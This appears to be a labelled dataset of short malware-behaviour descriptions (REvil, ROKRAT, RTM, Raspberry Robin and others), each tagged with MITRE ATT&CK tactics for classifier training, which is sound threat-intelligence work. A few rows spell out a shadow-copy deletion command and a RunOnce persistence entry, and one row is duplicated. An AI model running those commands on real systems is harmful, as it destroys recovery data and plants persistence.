REvil can save encryption parameters and system information in the Registry.,['TA0005:Defense Evasion']
REvil can download a copy of itself from an attacker controlled IP address to the victim machine.,['TA0011:Command and Control']
REvil can use vssadmin to delete volume shadow copies and bcdedit to disable recovery features.,['TA0040:Impact']
REvil has been executed via malicious MS Word e-mail attachments.,['TA0002:Execution']
REvil can mimic the names of known executables.,['TA0005:Defense Evasion']
REvil can modify the Registry to save encryption parameters and system information.,['TA0005:Defense Evasion']
REvil attempts to create a mutex using a hard-coded value to ensure that no other instances of itself are running on the host.,['TA0005:Defense Evasion']
REvil can use Native API for execution and to retrieve active services.,['TA0002:Execution']
REvil has used PowerShell to delete volume shadow copies and download files.,['TA0002:Execution']
REvil can inject itself into running processes on a compromised host.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
REvil can query the Registry to get random file extensions to append to encrypted files.,['TA0007:Discovery']
REvil can force a reboot in safe mode with networking.,['TA0005:Defense Evasion']
REvil has the capability to stop services and kill processes.,['TA0040:Impact']
REvil has been distributed via malicious e-mail attachments including MS Word Documents.,['TA0001:Initial Access']
"REvil can identify the username, machine name, system language, keyboard layout, OS version, and system drive information on a compromised host.",['TA0007:Discovery']
"REvil can check the system language using GetUserDefaultUILanguage and GetSystemDefaultUILanguage. If the language is found in the list, the process terminates.",['TA0007:Discovery']
REvil can enumerate active services.,['TA0007:Discovery']
REvil can obtain the token from the user that launched the explorer.exe process to avoid affecting the desktop of the SYSTEM user.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
REvil has used obfuscated VBA macros for execution.,['TA0002:Execution']
REvil has used HTTP and HTTPS in communication with C2.,['TA0011:Command and Control']
REvil can use the Windows command line to delete volume shadow copies and disable recovery.,['TA0002:Execution']
REvil can use WMI to monitor for and kill specific processes listed in its configuration file.,['TA0002:Execution']
RGDoor encrypts files with XOR before sending them back to the C2 server.,['TA0009:Collection']
RGDoor decodes Base64 strings and decrypts strings using a custom XOR algorithm.,['TA0005:Defense Evasion']
RGDoor establishes persistence on webservers as an IIS module.,['TA0003:Persistence']
RGDoor uploads and downloads files to and from the victim’s machine.,['TA0011:Command and Control']
RGDoor executes the whoami on the victim’s machine.,['TA0007:Discovery']
RGDoor uses HTTP for C2 communications.,['TA0011:Command and Control']
RGDoor uses cmd.exe to execute commands on the victim’s machine.,['TA0002:Execution']
"APT12 has used the RIPTIDE RAT, which communicates over HTTP with a payload encrypted with RC4.",['TA0011:Command and Control']
"APT12 has used RIPTIDE, a RAT that uses HTTP to communicate.",['TA0011:Command and Control']
ROADSWEEP has been digitally signed with a certificate issued to the Kuwait Telecommunications Company KSC.,['TA0005:Defense Evasion']
ROADSWEEP can RC4 encrypt content in blocks on targeted systems.,['TA0040:Impact']
ROADSWEEP can decrypt embedded scripts prior to execution.,['TA0005:Defense Evasion']
The ROADSWEEP binary contains RC4 encrypted embedded scripts.,['TA0005:Defense Evasion']
"ROADSWEEP requires four command line arguments to execute correctly, otherwise it will produce a message box and halt execution.",['TA0005:Defense Evasion']
ROADSWEEP can use embedded scripts to remove itself from the infected host.,['TA0005:Defense Evasion']
"ROADSWEEP can enumerate files on infected devices and avoid encrypting files with .exe, .dll, .sys, .lnk, or . lck extensions.",['TA0007:Discovery']
ROADSWEEP has the ability to disable `SystemRestore` and Volume Shadow Copies.,['TA0040:Impact']
ROADSWEEP can pipe command output to a targeted process.,['TA0002:Execution']
ROADSWEEP has dropped ransom notes in targeted folders prior to encrypting the files.,['TA0040:Impact']
ROADSWEEP can identify removable drives attached to the victim's machine.,['TA0007:Discovery']
ROADSWEEP has been placed in the start up folder to trigger execution upon user login.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ROADSWEEP can disable critical services and processes.,['TA0040:Impact']
ROADSWEEP can enumerate logical drives on targeted devices.,['TA0007:Discovery']
ROADSWEEP can open cmd.exe to enable command execution.,['TA0002:Execution']
ROADTools automatically gathers data from Azure AD environments using the Azure Graph API.,['TA0009:Collection']
ROADTools can enumerate Azure AD users.,['TA0007:Discovery']
ROADTools leverages valid cloud credentials to perform enumeration operations using the internal Azure AD Graph API.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
ROADTools can enumerate Azure AD groups.,['TA0007:Discovery']
ROADTools can enumerate Azure AD applications and service principals.,['TA0007:Discovery']
ROADTools can enumerate Azure AD systems and devices.,['TA0007:Discovery']
ROCKBOOT is a Master Boot Record bootkit that uses the MBR to establish persistence.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
ROKRAT can use the `GetForegroundWindow` and `GetWindowText` APIs to discover where the user is typing.,['TA0007:Discovery']
ROKRAT has an audio capture and eavesdropping module.,['TA0009:Collection']
ROKRAT has used legitimate social networking sites and cloud platforms for C2 communications.,['TA0011:Command and Control']
ROKRAT can extract clipboard data from a compromised host.,['TA0009:Collection']
ROKRAT can steal credentials stored in Web browsers by querying the sqlite database.,['TA0006:Credential Access']
ROKRAT can collect host data and specific file types.,['TA0009:Collection']
ROKRAT can check for debugging tools.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
ROKRAT can decrypt strings using the victim's hostname as the key.,['TA0005:Defense Evasion']
ROKRAT relies on a specific victim hostname to execute and decrypt important strings.,['TA0005:Defense Evasion']
ROKRAT can send collected files back over same C2 channel.,['TA0010:Exfiltration']
ROKRAT can send collected data to cloud storage services such as PCloud.,['TA0010:Exfiltration']
ROKRAT can request to delete files.,['TA0005:Defense Evasion']
ROKRAT has the ability to gather a list of files and directories on the infected system.,['TA0007:Discovery']
ROKRAT can retrieve additional malicious payloads from its C2 server.,['TA0011:Command and Control']
ROKRAT can use `SetWindowsHookEx` and `GetKeyNameText` to capture keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
ROKRAT has relied upon users clicking on a malicious attachment delivered through spearphishing.,['TA0002:Execution']
ROKRAT can modify the `HKEY_CURRENT_USER\Software\Microsoft\Office\` registry key so it can bypass the VB object model on a compromised host.,['TA0005:Defense Evasion']
ROKRAT can use a variety of API calls to execute shellcode.,['TA0002:Execution']
ROKRAT can encrypt data prior to exfiltration by using an RSA public key.,['TA0005:Defense Evasion']
ROKRAT can list the current running processes on the system.,['TA0007:Discovery']
"ROKRAT can use `VirtualAlloc`, `WriteProcessMemory`, and then `CreateRemoteThread` to execute shellcode within the address space of `Notepad.exe`.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
ROKRAT can access the HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData Registry key to obtain the System manufacturer value to identify the machine type.,['TA0007:Discovery']
ROKRAT can capture screenshots of the infected system using the `gdi32` library.,['TA0009:Collection']
ROKRAT has been delivered via spearphishing emails that contain a malicious Hangul Office or Microsoft Word document.,['TA0001:Initial Access']
ROKRAT can check for VMware-related files and DLLs related to sandboxes.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
ROKRAT can gather the hostname and the OS version to ensure it doesn’t run on a Windows XP or Windows Server 2003 systems.,['TA0007:Discovery']
ROKRAT can collect the username from a compromised host.,['TA0007:Discovery']
ROKRAT has used Visual Basic for execution.,['TA0002:Execution']
ROKRAT can use HTTP and HTTPS for command and control communication.,['TA0011:Command and Control']
ROKRAT can steal credentials by leveraging the Windows Vault mechanism.,['TA0006:Credential Access']
RTM monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.,['TA0009:Collection']
"RTM can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
RTM has the ability to remove Registry entries that it created for persistence.,['TA0005:Defense Evasion']
RTM collects data from the clipboard.,['TA0009:Collection']
RTM samples have been signed with a code-signing certificates.,['TA0005:Defense Evasion']
RTM has used an RSS feed on Livejournal to update a list of encrypted C2 server names. RTM has also hidden Pony C2 server IP addresses within transactions on the Bitcoin and Namecoin blockchain.,['TA0011:Command and Control']
RTM can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism.,['TA0002:Execution']
"RTM has resolved Pony C2 server IP addresses by either converting Bitcoin blockchain transaction data to specific octets, or accessing IP addresses directly within the Namecoin blockchain.",['TA0011:Command and Control']
RTM can delete all files created during its execution.,['TA0005:Defense Evasion']
RTM can check for specific files and directories associated with virtualization and malware analysis.,['TA0007:Discovery']
RTM can download additional files.,['TA0011:Command and Control']
RTM can add a certificate to the Windows store.,['TA0005:Defense Evasion']
RTM can record keystrokes from both the keyboard and virtual keyboard.,"['TA0009:Collection', 'TA0006:Credential Access']"
"RTM has relied on users opening malicious email attachments, decompressing the attached archive, and double-clicking the executable within.",['TA0002:Execution']
"RTM has named the scheduled task it creates ""Windows Update"".",['TA0005:Defense Evasion']
RTM has been delivered as archived Windows executable files masquerading as PDF documents.,['TA0005:Defense Evasion']
RTM can delete all Registry entries created during its execution.,['TA0005:Defense Evasion']
RTM can use the FindNextUrlCacheEntryA and FindFirstUrlCacheEntryA functions to search for specific strings within browser history.,['TA0002:Execution']
RTM used Port 44443 for its VNC module.,['TA0011:Command and Control']
"RTM strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm. RTM has also been delivered to targets as various archive files including ZIP, 7-ZIP, and RAR.",['TA0005:Defense Evasion']
RTM can obtain a list of smart card readers attached to the victim.,['TA0007:Discovery']
RTM can obtain information about process integrity levels.,['TA0007:Discovery']
"RTM tries to add a Registry Run key under the name ""Windows Update"" to establish persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
RTM has the capability to download a VNC module from command and control .,['TA0011:Command and Control']
RTM runs its core DLL file using rundll32.exe.,['TA0005:Defense Evasion']
RTM tries to add a scheduled task to establish persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
RTM can capture screenshots.,['TA0009:Collection']
RTM can obtain information about security software on the victim.,['TA0007:Discovery']
RTM can scan victim drives to look for specific banking software on the machine to determine next actions.,['TA0007:Discovery']
RTM has been delivered via spearphishing attachments disguised as PDF documents.,['TA0001:Initial Access']
RTM encrypts C2 traffic with a custom RC4 variant.,['TA0011:Command and Control']
"RTM can obtain the computer name, OS version, and default language identifier.",['TA0007:Discovery']
RTM can obtain the victim username and permissions.,['TA0007:Discovery']
RTM can obtain the victim time zone.,['TA0007:Discovery']
RTM can detect if it is running within a sandbox or other virtualized analysis environment.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
RTM has initiated connections to external domains using HTTPS.,['TA0011:Command and Control']
RTM uses the command line and rundll32.exe to execute.,['TA0002:Execution']
"Raccoon Stealer archives collected system information in a text f ile, `System info.txt`, prior to exfiltration.",['TA0009:Collection']
Raccoon Stealer collects files and directories from victim systems based on configuration data downloaded from command and control servers.,['TA0009:Collection']
Raccoon Stealer will automatically collect and exfiltrate data identified in received configuration files from command and control nodes.,['TA0010:Exfiltration']
"Raccoon Stealer collects passwords, cookies, and autocomplete information from various popular web browsers.",['TA0006:Credential Access']
Raccoon Stealer gathers information from repositories associated with cryptocurrency wallets and the Telegram messaging service.,['TA0009:Collection']
Raccoon Stealer collects data from victim machines based on configuration information received from command and control nodes.,['TA0009:Collection']
"Raccoon Stealer uses RC4-encrypted, base64-encoded strings to obfuscate functionality and command and control servers.",['TA0005:Defense Evasion']
Raccoon Stealer dynamically links key WinApi functions during execution.,['TA0005:Defense Evasion']
Raccoon Stealer uses RC4 encryption for strings and command and control addresses to evade static detection.,['TA0005:Defense Evasion']
Raccoon Stealer uses existing HTTP-based command and control channels for exfiltration.,['TA0010:Exfiltration']
Raccoon Stealer can remove files related to use and installation.,['TA0005:Defense Evasion']
Raccoon Stealer identifies target files and directories for collection based on a configuration file.,['TA0007:Discovery']
Raccoon Stealer downloads various library files enabling interaction with various data stores and structures to facilitate follow-on information theft.,['TA0011:Command and Control']
Raccoon Stealer checks the privileges of running processes to determine if the running user is equivalent to `NT Authority\System`.,['TA0007:Discovery']
Raccoon Stealer queries the Windows Registry to fingerprint the infected host via the `HKLM:\SOFTWARE\Microsoft\Cryptography\MachineGuid` key.,['TA0007:Discovery']
Raccoon Stealer can capture screenshots from victim systems.,['TA0009:Collection']
Raccoon Stealer is capable of identifying running software on victim machines.,['TA0007:Discovery']
Raccoon Stealer attempts to steal cookies and related information in browser history.,['TA0006:Credential Access']
Raccoon Stealer has been distributed through cracked software downloads.,['TA0001:Initial Access']
"Raccoon Stealer gathers information on infected systems such as operating system, processor information, RAM, and display information.",['TA0007:Discovery']
"Raccoon Stealer collects the `Locale Name` of the infected device via `GetUserDefaultLocaleName` to determine whether the string `ru` is included, but in analyzed samples no action is taken if present.",['TA0007:Discovery']
Raccoon Stealer gathers information on the infected system owner and user.,['TA0007:Discovery']
Raccoon Stealer gathers victim machine timezone information.,['TA0007:Discovery']
"Raccoon Stealer uses HTTP, and particularly HTTP POST requests, for command and control actions.",['TA0011:Command and Control']
Ragnar Locker encrypts files on the local machine and mapped drives prior to displaying a note demanding a ransom.,['TA0040:Impact']
Ragnar Locker has attempted to terminate/stop processes and services associated with endpoint security products.,['TA0005:Defense Evasion']
Ragnar Locker can delete volume shadow copies using vssadmin delete shadows /all /quiet.,['TA0040:Impact']
Ragnar Locker has been delivered as an unsigned MSI package that was executed with msiexec.exe.,['TA0005:Defense Evasion']
Ragnar Locker may attempt to connect to removable drives and mapped network drives.,['TA0007:Discovery']
Ragnar Locker has used regsvr32.exe to execute components of VirtualBox.,['TA0005:Defense Evasion']
"Ragnar Locker has used VirtualBox and a stripped Windows XP virtual machine to run itself. The use of a shared folder specified in the configuration enables Ragnar Locker to encrypt files on the host operating system, including files on any mapped drives.",['TA0005:Defense Evasion']
Ragnar Locker has used rundll32.exe to execute components of VirtualBox.,['TA0005:Defense Evasion']
Ragnar Locker has used sc.exe to execute a service that it creates.,['TA0002:Execution']
Ragnar Locker has attempted to stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted.,['TA0040:Impact']
"Before executing malicious code, Ragnar Locker checks the Windows API GetLocaleInfoW and doesn't encrypt files if it finds a former Soviet country.",['TA0007:Discovery']
Ragnar Locker has used cmd.exe and batch scripts to execute commands.,['TA0002:Execution']
Ragnar Locker has used sc.exe to create a new service for the VirtualBox driver.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Raindrop decrypted its Cobalt Strike payload using an AES-256 encryption algorithm in CBC mode with a unique key per sample.,['TA0005:Defense Evasion']
Raindrop encrypted its payload using a simple XOR algorithm with a single-byte key.,['TA0005:Defense Evasion']
Raindrop was built to include a modified version of 7-Zip source code and Far Manager source code.,['TA0005:Defense Evasion']
Raindrop was installed under names that resembled legitimate Windows file and directory names.,['TA0005:Defense Evasion']
"Raindrop used a custom packer for its Cobalt Strike payload, which was compressed using the LZMA algorithm.",['TA0005:Defense Evasion']
Raindrop used steganography to locate the start of its encoded payload within legitimate 7-Zip code.,['TA0005:Defense Evasion']
"After initial installation, Raindrop runs a computation to delay execution.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
RainyDay can use tools to collect credentials from web browsers.,['TA0006:Credential Access']
RainyDay can use side-loading to run malicious executables.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
RainyDay can use a file exfiltration tool to collect recently changed files on a compromised host.,['TA0009:Collection']
RainyDay can decrypt its payload via a XOR key.,['TA0005:Defense Evasion']
RainyDay has downloaded as a XOR-encrypted payload.,['TA0005:Defense Evasion']
RainyDay can use a file exfiltration tool to upload specific files to Dropbox.,['TA0010:Exfiltration']
RainyDay has the ability to switch between TCP and HTTP for C2 if one method is not working.,['TA0011:Command and Control']
RainyDay has the ability to uninstall itself by deleting its service and files.,['TA0005:Defense Evasion']
RainyDay can use a file exfiltration tool to collect recently changed files with specific extensions.,['TA0007:Discovery']
RainyDay can download files to a compromised host.,['TA0011:Command and Control']
RainyDay can use a file exfiltration tool to copy files to C:\ProgramData\Adobe\temp prior to exfiltration.,['TA0009:Collection']
"RainyDay has named services and scheduled tasks to appear benign including ""ChromeCheck"" and ""googleupdate.""",['TA0005:Defense Evasion']
"RainyDay has used names to mimic legitimate software including ""vmtoolsd.exe"" to spoof Vmtools.",['TA0005:Defense Evasion']
The file collection tool used by RainyDay can utilize native API including ReadDirectoryChangeW for folder monitoring.,['TA0002:Execution']
RainyDay can use TCP in C2 communications.,['TA0011:Command and Control']
RainyDay can enumerate processes on a target system.,['TA0007:Discovery']
RainyDay can use proxy tools including boost_proxy_client for reverse proxy functionality.,['TA0011:Command and Control']
RainyDay can use scheduled tasks to achieve persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
RainyDay has the ability to capture screenshots.,['TA0009:Collection']
RainyDay can use RC4 to encrypt C2 communications.,['TA0011:Command and Control']
RainyDay can create and register a service for execution.,['TA0007:Discovery']
RainyDay can use HTTP in C2 communications.,['TA0011:Command and Control']
RainyDay can use the Windows Command Shell for execution.,['TA0002:Execution']
RainyDay can use the QuarksPwDump tool to obtain local passwords and domain cached credentials.,['TA0006:Credential Access']
RainyDay can use services to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ramsay can insert itself into the address space of other applications using the AppInit DLL Registry key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ramsay can store collected documents in a custom container after encrypting and compressing them using RC4 and WinRAR.,['TA0009:Collection']
Ramsay can compress and archive collected files using WinRAR.,['TA0009:Collection']
"Ramsay can conduct an initial scan for Microsoft Word documents on the local system, removable media, and connected network drives, before tagging and collecting them. It can continue tagging documents to collect with follow up scans.",['TA0009:Collection']
Ramsay can use UACMe for privilege escalation.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Ramsay can use the Windows COM API to schedule tasks and maintain persistence.,['TA0002:Execution']
Ramsay can hijack outdated Windows application dependencies with malicious versions of its own DLL payload.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Ramsay can collect Microsoft Word documents from the target's file system, as well as .txt, .doc, and .xls files from the Internet Explorer cache.",['TA0009:Collection']
Ramsay can collect data from network drives and stage it for exfiltration.,['TA0009:Collection']
Ramsay can collect data from removable media and stage it for exfiltration.,['TA0009:Collection']
Ramsay can extract its agent from the body of a malicious document.,['TA0005:Defense Evasion']
Ramsay has been delivered using OLE objects in malicious documents.,['TA0002:Execution']
Ramsay can use ImprovedReflectiveDLLInjection to deploy components.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Ramsay has been embedded in documents exploiting CVE-2017-0199, CVE-2017-11882, and CVE-2017-8570.",['TA0002:Execution']
Ramsay can collect directory and file lists.,['TA0007:Discovery']
Ramsay can stage data prior to exfiltration in %APPDATA%\Microsoft\UserSetting and %APPDATA%\Microsoft\UserSetting\MediaCache.,['TA0009:Collection']
Ramsay has been executed through malicious e-mail attachments.,['TA0002:Execution']
Ramsay has masqueraded as a JPG image file.,['TA0005:Defense Evasion']
Ramsay has masqueraded as a 7zip installer.,['TA0005:Defense Evasion']
"Ramsay can use Windows API functions such as WriteFile, CloseHandle, and GetCurrentHwProfile during its collection and file storage operations. Ramsay can execute its embedded components via CreateProcessA and ShellExecute.",['TA0002:Execution']
Ramsay can scan for systems that are vulnerable to the EternalBlue exploit.,['TA0007:Discovery']
Ramsay can scan for network drives which may contain documents for collection.,['TA0007:Discovery']
Ramsay has base64-encoded its portable executable and hidden itself under a JPG header. Ramsay can also embed information within document footers.,['TA0005:Defense Evasion']
Ramsay can scan for removable media which may contain documents for collection.,['TA0007:Discovery']
Ramsay can gather a list of running processes by using Tasklist.,['TA0007:Discovery']
Ramsay has created Registry Run keys to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ramsay can spread itself by infecting other portable executable files on removable drives.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
Ramsay has included a rootkit to evade defenses.,['TA0005:Defense Evasion']
Ramsay can schedule tasks via the Windows COM API to maintain persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ramsay can take screenshots every 30 seconds as well as when an external removable storage device is connected.,['TA0009:Collection']
Ramsay has been distributed through spearphishing emails with malicious attachments.,['TA0001:Initial Access']
Ramsay has used base64 to encode its C2 traffic.,['TA0011:Command and Control']
Ramsay has PE data embedded within JPEG files contained within Word documents.,['TA0005:Defense Evasion']
"Ramsay can detect system information--including disk names, total space, and remaining space--to create a hardware profile GUID which acts as a system identifier for operators.",['TA0007:Discovery']
"Ramsay can use ipconfig and Arp to collect network configuration information, including routing information and ARP tables.",['TA0007:Discovery']
Ramsay can use netstat to enumerate network connections.,['TA0007:Discovery']
Ramsay can spread itself by infecting other portable executable files on networks shared drives.,['TA0008:Lateral Movement']
Ramsay has included embedded Visual Basic scripts in malicious documents.,['TA0002:Execution']
Ramsay has used HTTP for C2.,['TA0011:Command and Control']
Raspberry Robin implements a variation of the ucmDccwCOMMethod technique abusing the Windows AutoElevate backdoor to bypass UAC while elevating privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Raspberry Robin is capable of contacting the TOR network for delivering second-stage payloads.,['TA0011:Command and Control']
Raspberry Robin will use the legitimate Windows utility fodhelper.exe to run processes at elevated privileges without requiring a User Account Control prompt.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Raspberry Robin uses a RunOnce Registry key for persistence, where the key is removed after its use on reboot then re-added by the malware after it resumes execution.",['TA0005:Defense Evasion']
Raspberry Robin variants can be delivered via highly obfuscated Windows Script Files for initial execution.,['TA0002:Execution']
Raspberry Robin creates an elevated COM object for CMLuaUtil and uses this to set a registry value that points to the malicious LNK file during execution.,['TA0002:Execution']
"Raspberry Robin can use legitimate, signed EXE files paired with malicious DLL files to load and run malicious payloads while bypassing defenses.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Raspberry Robin leverages anti-debugging mechanisms through the use of ThreadHideFromDebugger.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Raspberry Robin contains several layers of obfuscation to hide malicious code from detection and analysis.,['TA0005:Defense Evasion']
Raspberry Robin can add an exception to Microsoft Defender that excludes the entire main drive from anti-malware scanning to evade detection.,['TA0005:Defense Evasion']
"Raspberry Robin uses newly-registered domains containing only a few characters for command and controll purposes, such as ""v0.cx"".",['TA0042:Resource Development']
Raspberry Robin will check for the presence of several security products on victim machines and will avoid UAC bypass mechanisms if they are identified. Raspberry Robin can use specific cookie values in HTTP requests to command and control infrastructure to validate that requests for second stage payloads originate from the initial downloader script.,['TA0005:Defense Evasion']
Raspberry Robin can delete its initial delivery script from disk during execution.,['TA0005:Defense Evasion']
Raspberry Robin will check to see if the initial executing script is located on the user's Desktop as an anti-analysis check.,['TA0007:Discovery']
Raspberry Robin will drop a copy of itself to a subfolder in %Program Data% or %Program Data%\\Microsoft\\ to attempt privilege elevation and defense evasion if not running in Session 0.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Raspberry Robin retrieves its second stage payload in a variety of ways such as through msiexec.exe abuse, or running the curl command to download the payload to the victim's %AppData% folder.",['TA0011:Command and Control']
Raspberry Robin contains an embedded custom Tor network client that communicates with the primary payload via shared process memory.,['TA0002:Execution']
"Raspberry Robin variants have been delivered via malicious advertising items that, when interacted with, download a malicious archive file containing the initial payload, hosted on services such as Discord.",['TA0042:Resource Development']
Raspberry Robin has historically been delivered via infected USB drives containing a malicious LNK object masquerading as a legitimate folder.,['TA0005:Defense Evasion']
"Raspberry Robin will execute its payload prior to initializing command and control traffic by impersonating one of several legitimate program names such as dllhost.exe, regsvr32.exe, or rundll32.exe.",['TA0005:Defense Evasion']
Raspberry Robin uses msiexec.exe for post-installation communication to command and control infrastructure. Msiexec.exe is executed referencing a remote resource for second-stage payload retrieval and execution.,['TA0005:Defense Evasion']
Raspberry Robin will communicate via HTTP over port 8080 for command and control traffic.,['TA0011:Command and Control']
Raspberry Robin uses mixed-case letters for filenames and commands to evade detection.,['TA0005:Defense Evasion']
"Raspberry Robin uses the Windows utility odbcconf.exe to execute malicious commands, using the regsvr flag to execute DLLs and bypass application control mechanisms that are not monitoring for odbcconf.exe abuse.",['TA0005:Defense Evasion']
"Raspberry Robin can identify processes running on the victim machine, such as security software, during execution.",['TA0007:Discovery']
"Raspberry Robin will execute a legitimate process, then suspend it to inject code for a Tor client into the process, followed by resumption of the process to enable Tor client execution.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Raspberry Robin will use a Registry key to achieve persistence through reboot, setting a RunOnce key such as: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce {random value name} = “rundll32 shell32 ShellExec_RunDLLA REGSVR /u /s “{dropped copy path and file name}”” .","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Raspberry Robin uses regsvr32.exe execution without any command line parameters for command and control requests to IP addresses associated with Tor nodes.,['TA0005:Defense Evasion']
Raspberry Robin has historically used infected USB media to spread to new victims.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
"Raspberry Robin uses rundll32 execution without any command line parameters to contact command and control infrastructure, such as IP addresses associated with Tor nodes.",['TA0005:Defense Evasion']
"Raspberry Robin attempts to identify security software running on the victim machine, such as BitDefender, Avast, and Kaspersky.",['TA0007:Discovery']
Raspberry Robin contains multiple payloads that are packed for defense evasion purposes and unpacked on runtime.,['TA0005:Defense Evasion']
"Raspberry Robin performs a variety of system environment checks to determine if it is running in a virtualized or sandboxed environment, such as querying CPU temperature information and network card MAC address information.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"Raspberry Robin performs several system checks as part of anti-analysis mechanisms, including querying the operating system build number, processor vendor and type, video controller, and CPU temperature.",['TA0007:Discovery']
"Raspberry Robin determines whether it is successfully running on a victim system by querying the running account information to determine if it is running in Session 0, indicating running with elevated privileges.",['TA0007:Discovery']
Raspberry Robin execution can rely on users directly interacting with malicious LNK files.,['TA0002:Execution']
"Raspberry Robin contains real and fake second-stage payloads following initial execution, with the real payload only delivered if the malware determines it is not running in a virtualized environment.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
Raspberry Robin uses outbound HTTP requests containing victim information for retrieving second stage payloads. Variants of Raspberry Robin can download archive files via the victim web browser for second stage execution.,['TA0011:Command and Control']
"Raspberry Robin second stage payloads can be hosted as RAR files, containing a malicious EXE and DLL, on Discord servers.",['TA0011:Command and Control']
Raspberry Robin uses cmd.exe to read and execute a file stored on an infected USB device as part of initial installation.,['TA0002:Execution']
"Raspberry Robin can execute via LNK containing a command to run a legitimate executable, such as wmic.exe, to download a malicious Windows Installer package.",['TA0002:Execution']
RawDisk was used in Shamoon to write to protected system locations such as the MBR and disk partitions in an effort to destroy data.,['TA0040:Impact']
RawDisk has been used to directly access the hard disk to help overwrite arbitrarily sized portions of disk content.,['TA0040:Impact']
RawDisk was used in Shamoon to help overwrite components of disk structure like the MBR and disk partitions.,['TA0040:Impact']
RawPOS encodes credit card data it collected from the victim with XOR.,['TA0009:Collection']
"RawPOS dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data.",['TA0009:Collection']
"Data captured by RawPOS is placed in a temporary file under a directory named ""memdump"".",['TA0009:Collection']
"New services created by RawPOS are made to appear like legitimate Windows services, with names such as ""Windows Management Help Service"", ""Microsoft Support"", and ""Windows Advanced Task Manager"".",['TA0005:Defense Evasion']
RawPOS installs itself as a service to maintain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Rclone can compress files using `gzip` prior to exfiltration.,['TA0009:Collection']
"The Rclone ""chunker"" overlay supports splitting large files in smaller chunks during upload to circumvent size limits.",['TA0010:Exfiltration']
Rclone can exfiltrate data over SFTP or HTTPS via WebDAV.,['TA0010:Exfiltration']
"Rclone can exfiltrate data over FTP or HTTP, including HTTP via WebDAV.",['TA0010:Exfiltration']
"Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.",['TA0010:Exfiltration']
"Rclone can list files and directories with the `ls`, `lsd`, and `lsl` commands.",['TA0007:Discovery']
Reaver encrypts collected data with an incremental XOR key prior to exfiltration.,['TA0009:Collection']
Reaver drops and executes a malicious CPL file as its payload.,['TA0005:Defense Evasion']
Reaver encrypts some of its files with XOR.,['TA0005:Defense Evasion']
Reaver deletes the original dropped file from the victim.,['TA0005:Defense Evasion']
Some Reaver variants use raw TCP for C2.,['TA0011:Command and Control']
Reaver queries the Registry to determine the correct Startup path to use for persistence.,['TA0007:Discovery']
Reaver creates a shortcut file and saves it in a Startup folder to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Reaver creates a shortcut file and saves it in a Startup folder to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Reaver collects system information from the victim, including CPU speed, computer name, volume serial number, ANSI code page, OEM code page identifier for the OS, Microsoft Windows version, and memory information.",['TA0007:Discovery']
Reaver collects the victim's IP address.,['TA0007:Discovery']
Reaver collects the victim's username.,['TA0007:Discovery']
Some Reaver variants use HTTP for C2.,['TA0011:Command and Control']
Reaver installs itself as a new service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
RedLeaves can gather browser usernames and passwords.,['TA0006:Credential Access']
RedLeaves is launched through use of DLL search order hijacking to load a malicious dll.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"A RedLeaves configuration file is encrypted with a simple XOR key, 0x53.",['TA0005:Defense Evasion']
RedLeaves can delete specified files.,['TA0005:Defense Evasion']
RedLeaves can enumerate and search for files and directories.,['TA0007:Discovery']
RedLeaves is capable of downloading a file from a specified URL.,['TA0011:Command and Control']
"RedLeaves can use HTTP over non-standard ports, such as 995, for C2.",['TA0011:Command and Control']
